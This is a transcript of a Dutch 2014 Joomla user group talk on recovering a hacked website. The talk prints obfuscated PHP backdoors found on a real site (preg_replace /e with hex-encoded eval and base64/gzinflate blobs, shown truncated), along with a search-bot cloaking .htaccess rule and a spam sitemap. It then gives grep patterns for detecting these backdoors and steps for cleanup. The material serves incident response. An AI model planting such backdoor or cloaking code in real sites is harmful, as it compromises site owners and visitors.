Help mijn website is gehackt - Joomla User Group Den Bosch 2014

Help mijn siteis gehackt... wat nu?

door Peter Martin www.db8.nl / @pe7er

Joomla User Group Den Bosch – 1 december 2014Joomla User Group Den Bosch – 1 december 2014

1.Waarom hacken?

2.Website gehackt

3.SSH connectie

4.Procedure– Backup

– Analyse

– Herstel

Website gehackt

Waarom hacken?

1. Credit Cards

2. Informatie

3. Graffiti

4. Phishing

5. SPAM

6. Backlinks

7. DDOS

8. CPU

9. Handel

Website gehackt

Website gehackt 1


Website gehackt 1

Klant

Hosting Provider

opencoffeewebsite

is gehackt

?!?!Andere sites,

zelfde IP ook!?!

(laconiek) gewoonindex.php

terugzetten

Hierbij zeg ik mijn hosting op, asap!

Website gehackt 2


Website gehackt 2

Klant website

Fabrik

?!?!from: @ .brto: @ .br !?!

E-mail bouncedpaar dagen

Spam script, tijdstipin access log

Front-end upload:Bestandsformaatniet toegestaan!

Website gehackt 3


Website gehackt 3

Klant

SSH op website

Backup,(just in case)

?!?! verschil groottevorige backup?

Verdachte phpbestanden &

viagra sitemap.xml

Ik admintoegang opwebsite?


Backdoor 1

/includes/xmlrpc.php - 07 september 2014 23:15:01<?php# GNU LESSER GENERAL PUBLIC LICENSE# Version 3, 29 June 2007# # Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> # Everyone is permitted to copy and distribute verbatim copies# of this license document, but changing it is not allowed. [..]## You should have received a copy of the GNU General Public License# along with this program. If not, see <http://www.gnu.org/licenses/>$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";$color = "#df5";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66 \x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBsoDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHBM+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ

Niet in backup van 18 oktober 2014 !

Gehackt op 19 oktober 2014

http://www.gnu.org/licenses/


Payload 1

.htaccess - 09 november 11:45:48RewriteEngine OnRewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]

### @package Joomla# @copyright Copyright (C) 2005 2014 Open Source Matters. All rights reserved.# @license GNU General Public License version 2 or later; see LICENSE.txt##

Toegevoegd

Hack via backdoor door 2e hacker


Payload 2

main.php - 10 juli 2013 11:25:27<?php Error_Reporting(0); $xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N/6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtwxptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRlESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoAVCh+[..]+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQPUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]

Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.

preg_replace("/.*/e","eval(base64_decode('


Payload 3

sitemap.xml - 9 november 2014 11:50:42<?xml version="1.0" encoding="UTF8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.voorbeeld.nl/viagraprofessional100mg/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</loc> <lastmod>20141109</lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url></urlset>

Hack via backdoor door 2e hacker,op 9 november 2014 toegevoegd.

590 spam links


Backdoor 2

/libraries/joomla/session/cache.php 19 augustus 2013 14:45:46 <?php Error_Reporting(0); $x0bp6Rx0vRH="vRhrb9s28K+71VLHDtCsfmRTggC2GUOijFo1LWlA3CY/oAX6F0ZDZWWlk5ols9MmLnZHUrLkR5btw5w4Eo/34r2Z9x8Mz6Oe2SIB9Zhrd5N5unz/4f2HqU+8N8Qzx/A0rS6xmbgXL6Zm22j9bLRO+ctG48hswsqsPjP2G/xEUrkdkXwOPNI1BxbrDxM+84nTOaNs5vJYbPJMU/FOSutS2nUIiKhU620j51Vi9UziALPzrm9d9T1r5BDvvNrzf6LsSm2eH5CeawWWx2zi+ec5xdUBPXNhe8hYcI4c/MDtAbFm8qh2K92YNyag2kRqHIxZx5XgRqupNJ52CXNc+7UPQE5tDsDpgPZwNecSQ8Bn2nO9e+a5g8RnnumRwLH6JOGj0SjiMefxmo1f1tpg3WgFbRm/NI12w2y2DvlJit7KuQ56Nwm+IPAj/E4Diw2VrF30GbnElPT4phnIHd97M/S3eV9ptlxHg1Mx6tAR8RINlNzwveP4CiE/dojHDuMwjLfjSo3UKgqvnFArhrHh+j5hyZQFgfYTGwSoO1AhEI0Pj0sivdFA+08EcXyCuAIZdMZ2n7nUNsmF6zM/4f6lb4ILTUYGgQlm5BuM1zESab8C3wJuAvu2NSCJaVYO64ZpKl9NdAC5neSz60smGVEUzsIoP+0sBPHIdPAakMROrHh+fX2dZnu0mucJwFJtpXWW1AkIoFOCpcYzyW8OKhuUr9if4Dv38D";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXN

via backdoor door 2e hacker,op 9 november 2014 toegevoegd.


Aangepast!


Backdoor 3

/administrator/fs-login.phtml - 09 november 2014 11:45:48<?php Error_Reporting(0);$xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dwyfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXBtpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQby3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II55Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0urhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..]N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNj




Backdoor 4-9

Toegevoegd op 09 november 2014 11:45:48

/language/comnon.phtml /layouts/fedit.php /libraries/fedit.php/logs/comnon.php/plugins/fs-login.phtml/tmp/Iicense.php

bevat:

<?php Error_Reporting(0);

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28


Gevolg

SSH connectie


Terminal

Text Terminal

“TTY” TeleTYpewriter


Terminal

Windows– SSH programma: PuTTY

Mac OSX– Ingebouwd: “Terminal”

Linux– Ingebouwde Terminal Emulator


SSH

Secure SHell

gebruikt public-key cryptografie (authenticatie & veilige data communicatie)

peter@computer:~$ ssh [email protected]


SSH

peter@computer:~$ ssh [email protected]

The authenticity of host 'example.com (93.184.216.119)' can't be established.RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known [email protected]'s password:

[email protected] ~ $

Procedure

Backup


Backup files

Backup van voor de hack?– Hosting partij?

– Akeeba backup (offline)?

Maak backup van huidige situatie (inclusief hack!)– Akeeba backup

– Rsync / MySQL dump


rsync

Remote synchronization– rsync van “bron” naar “doel”

$ rsync -arv [email protected]:~/joomla-cms/ /var/www/joomla-cms-backup/

gebruikersnaam@ server : folder

gebruikersnaam@ server : folder


MySQL Dump

MySQL Dump

$ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt

Analyse


Analyse

● Software versies:– CMS (Joomla versie?)

– Versies 3rd party extensies?

● Access Logfiles– Vreemde POST requests?


Analyse

● Nieuwe bestanden op server– .php files in /images/ map?

● Bestanden met vreemde code– Base64 decode

● Vergelijk bestanden met originele bestanden– diff


Nieuwe bestanden

Aangemaakt in de laatste 7 dagen:

find . -type f -ctime -7


Recent gewijzigd

Gewijzigd tussen 7 en 3 dagen geleden:

find . -type f -mtime -7 ! -mtime -3


grep

● Zoek naar specifieke teksten

grep -r "eval" /var/www/joomla-cms | grep "base64_decode"

● Of

grep -r "preg_replace" /var/www/joomla-cms | grep "\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28"

grep -r "eval" /var/www/joomla-cms | grep "<?php Error_Reporting(0);”


NeoPi


NeoPi

Detectie van verborgen web shell codeBenodigd Python 2.6

Installeer via git:

$ git clone https://github.com/Neohapsis/NeoPI.git

Start script:

$ /var/www/NeoPI/neopi.py -Aa /var/www/joomla-cms


diff


diff

Vergelijk bestanden van website met originele bestanden:

– Zorg voor map met originele Joomla + extensies● Oude backup of● Nieuwe installatie Joomla + extensies

– Zorg voor map met gehackte website

Gebruik diff software om te vergelijken:

– Linux + OSX: Meld

– Windows: WinMerge

Herstel


Herstel

● Verwijderen alle hacker scripts– Kijk verder dan “hack” ivm backdoor scripts

● Alle software up-to-date brengen– Joomla

– 3rd party extensions


Herstel

● Wachtwoorden vervangen– MySQL database wachtwoord

– FTP wachtwoord

– Wachtwoorden van Joomla gebruikers

● Evt extra controle:– Backup schoon gemaakte website

vergelijken met nieuwe Joomla installatie → diff


Herstel

● Eigen .xml sitemap aanmelden bij Google

● Spam pagina's sneller uit zoekmachines?

"410 Gone error" via .htaccess:

RewriteRule \S*viagra+\S* [G]RewriteRule \S*cialis+\S* [G]RewriteRule \S*pharmacy+\S* [G]RewriteRule \S*propecia+\S* [G]RewriteRule \S*drugs+\S* [G]

Conclusie


1.Waarom?

2.Website gehackt

3.SSH connectie

4.Procedure– Backup

– Analyse

– Herstel

Conclusie


Vragen?

Peter Martin

e-mail: info at db8.nl

website: www.db8.nl

twitter: @pe7er

Presentatie: http://www.db8.nl


Used PhotosTitel sheet:

Guy Fawkes Mask - Ben Fredericson, 2009http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg

1. Waarom hacken?Question mark (3534516458) - Marco Bellucci, 2005http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg

Credit-cards - Lotus Head, 2005 http://commons.wikimedia.org/wiki/File:Credit-cards.jpg

Pickpocket girl - Lunch Photography, 2008 http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg

Graffiti-Sokolov5 - Orange.man, 2008 http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG

Phishing - Stomchak, 2010 http://commons.wikimedia.org/wiki/File:Phishing.JPG

Spam 2 - Bodo Akdeniz, 2005 http://commons.wikimedia.org/wiki/File:Spam_2.jpg

Plugboard wires - Daniel Sancho, 2005http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg


Used PhotosWAC telephone operators operate the Victory switchboard during the Potsdam Conference in their headquarters in - U.S. National Archives and Records Administration, 1945http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard_during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg

Butterfly Labs Bitcoin miner - arstechnica.com, 2013http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg

Cirencester, market place - Tony Grist, 2008http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg

2. Hacked

Youve-been-hacked, Hanonen, 2014http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg

Piedbiche - Isabelle Grosjean, 2001http://commons.wikimedia.org/wiki/File:Piedbiche.jpg

3. SSH connectie

Switchboard Manual - Peel Conner, Geez-oz, 2012http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG

Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschine_mit_Telefonanschluss.jpg


Used Photos4. Procedure

Motorola M6800 manuals - Michael Holley, 2010http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg

BackupIBM 7330 on white background, Crisco 1492, 2013http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg

AnalysePostcards and magnifying glass, Anna, 2007http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg

Magnifying glass on antique table - Stéphane Magnenat, 2008http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg

Magnifying glass - Faberge - shakko, 2011http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg

Binary Code, Cncplayer, 2013http://commons.wikimedia.org/wiki/File:Binary_Code.jpg

Two different shoes on, Kelly Bailey, 2007http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg

HerstelIBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg

Conclusie

EquinoxeJuniorHighPac-Man - Equinoxe, 2012http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png

Help mijn website is gehackt - Joomla User Group Den Bosch 2014

Technology

Transcript of Help mijn website is gehackt - Joomla User Group Den Bosch 2014